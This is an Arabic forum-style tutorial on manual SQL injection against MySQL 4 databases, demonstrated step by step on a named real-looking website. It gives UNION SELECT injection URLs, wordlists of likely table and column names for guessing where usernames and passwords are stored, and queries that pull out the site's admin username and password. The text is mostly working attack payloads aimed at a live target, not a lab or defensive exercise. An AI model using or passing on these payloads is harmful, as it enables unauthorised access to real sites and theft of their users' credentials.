السلام عليكم ورحمة الله وبركاتة
اول شي مبروك على رجعة الموقع
طيب موضوعنا اليوم شرح عن كيفية التعامل مع الاصدار الرابع "4" في ثغرات الحقن
جميعنا نعرف ان الاصدار الرابع في الحقن صعب جدا وكله تخمين بتخمين واذا بدك تستغل يدوي يمكن تزهق حياتك وانتي تخمن
لذالك الالغلب اصبح يستخدم البرامج للاستغلال
والبعض او عشاق ثغرات الحقن الي بستغلو يدوي بحبو يعرفو طريقه التعامل مع هذا الاصدار (الاصدار الرابع)
والان ساشرح الطريقه + تطبيق على موقع
نبدء على بركة الله..
الموقع الذي سنطبق عليه الشرح عدد اعمدتة 3 وايضا العامود المصاب هو الثالث فقط
كود:
http://www.lawchart.com/index.php?id=-3+union+select+1,2,3--
نحذف رقم 3 ونضع بداله كلمة version() لمعرفة اصدار القاعدة ,, يعني يصير الامر هكذا..
كود:
http://www.lawchart.com/index.php?id=-3+union+select+1,2,version()--
ظهر معنى الاصدار الرابع " 4.1.22-log "
الان نضيف عليها الامر +from يعني يصبح الرابط هكذا.
كود:
http://www.lawchart.com/index.php?id=-3+union+select+1,2,3+from--
ونجرب نضيف احد هذة الكلمات ( تابع اسا بتفهم كل شي .. )
member
admin
user
users
accounts
std_users
myuser
sys_user
mysql.db ++user
main
sf_user
tt_user
mo_user
mos_user
login
mysql.user
mysql.users
admin_login
jos_users
jos_session
wp_users
bg_users
usuarios
login_username
user_login
admin_sections
نجربهن ونشوف اي وحدي منهن الصحيحه
ما هذة الكلمات ؟؟ لماذا!؟
هذة الكلمات هي من الممكن ان تكون اسم الجدول الي يوجد بداخله اليوزر والباسورد
يعني هذه الكلمات هي اسماء الجداول الي فيها ملف اليوزر والباسورد (ممكن يكونو هني وممكن لا )
ولكن كيف سأعرف ان هذا اسم الجدول صحيح ام غير صحيح ؟؟
على سبيل المثال عندما تضع كلمة member او اي كلمة موجودة بالاعلى..
كود:
http://www.lawchart.com/index.php?id=-3+union+select+1,2,3+from+member--
اذا ظهر معك خطء ورجعت الصفحة خربت من هنا اعرف ان هذة الكلمه غير صحيحه وما في منو هاد الجدول ,,, حاول تجرب على كلمة ثانيه
واذا لم يظهر معك الخطء ولم يتغير شي بالصفحة فهذا هو الجدول الي بداخله يوجد ملف اليوزر والباسورد
وبالموقع الي منطبق عليه زبطت معنا كلمة users يعني هيك يصير الرابط
كود:
http://www.lawchart.com/index.php?id=-3+union+select+1,2,3+from+users--
احنا هيك تخطينا اول خطوة من التخمين وضل علينا نخمن اسم ملف اليوزر واسم ملف الباسورد
لكن كيف ستحدث هذة؟؟
نحن قلنا ان العامود المصاب هو العامود الثالث يعني التخمين رح يكون على العامود الثالث
لتخمين اليوزر
login
user
username
users
username
user_name
admin
adminlogin
loginmember
membername
admin_lastname
lastname
fristname
uname
name
+user_login
aid
id
user_sections
user_username
user_id
user_first_name
----------------
لتخمين الباسورد
userPass
password
admin_password
pass
passwd
pwd
user_pass
user_password
وعلى الموقع الي منطبق عليه زبط معنا username,password
يعني لو بدنا نطلع اليوزر منحط بدل الرقم 3 "username" ..يصير الرابط هيك..
كود:
http://www.lawchart.com/index.php?id=-3+union+select+1,2,username+from+users--
طيب حلوو طلع لنا اليوزرنيم:- admin
الان نطلع الباسورد ,, نستبدل كلمة username بكلمة password يعني الرابط بصير هيك
كود:
http://www.lawchart.com/index.php?id=-3+union+select+1,2,password+from+users--